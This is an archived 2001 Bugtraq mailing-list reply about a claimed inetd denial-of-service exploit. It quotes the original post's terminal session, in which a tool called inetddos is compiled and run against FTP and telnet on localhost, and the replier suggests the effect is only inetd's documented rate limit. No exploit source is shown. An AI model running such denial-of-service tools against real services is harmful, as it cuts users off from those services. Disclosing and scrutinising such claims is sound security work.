[19403] in bugtraq
Re: inetd DoS exploit
daemon@ATHENA.MIT.EDU (Peter Werner)
Tue Feb 27 18:03:37 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <010701c0a044$edf2b360$0900a8c0@documenta.com.au>
Date: Tue, 27 Feb 2001 09:39:06 +1100
Reply-To: Peter Werner <peterw@DOCUMENTA.COM.AU>
From: Peter Werner <peterw@DOCUMENTA.COM.AU>
X-To: "Serega[linux]" <linux@IHGROUP.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
NAME
inetd - internet ``super-server''
SYNOPSIS
inetd [-d] [-R rate] [configuration file]
....
-R rate
Specify the maximum number of times a service can be
invoked in
one minute; the default is 256.
isnt this a feature of inetd?
ie, it stops answering request's for a service when the maximum
number has been reached?
did you wait ~10 minutes to try reconnect? or does inetd/box
actually need to be restarted?
----- Original Message -----
From: Serega[linux] <linux@IHGROUP.RU>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Monday, February 26, 2001 3:26 AM
Subject: [BUGTRAQ] inetd DoS exploit
> Name: inetd DoS exploit
> Author: Serega[Linux]
>
>
> [ser@ihg prog]$ ./pscaner -h 127.0.0.1 /* it's my port scaner
*/
> Open ports on [127.0.0.1]
> -----------------------------
> [21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat
Feb 17 15:10:44 MSK 2001) ready.
> [23] OPEN :
> [25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun,
25 Feb 2001 18:58:36 +0300
> -----------------------------
>
> [ser@ihg prog]$ telnet 127.0.0.1 21
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
> 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17
15:10:44 MSK 2001) ready.
>
> [ser@ihg prog]$ cc inetddos.c -o inetddos
> [ser@ihg prog]$ ./inetddos 127.0.0.1 21
> DoS OK
> [ser@ihg prog]$ telnet 127.0.0.1 21
> Trying 127.0.0.1...
> telnet: Unable to connect to remote host: Connection refused
> [ser@ihg prog]$ telnet 127.0.0.1 23
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
> login:
>
> [ser@ihg prog]$ ./inetddos 127.0.0.1 23
> DoS OK
> [ser@ihg prog]$ telnet 127.0.0.1 23
> Trying 127.0.0.1...
> telnet: Unable to connect to remote host: Connection refused
>
> --
> /*
> * mailto:linux@ihgroup.ru
> * ICQ: 64432299
> * Home Page: http://127.0.0.1
> */
>
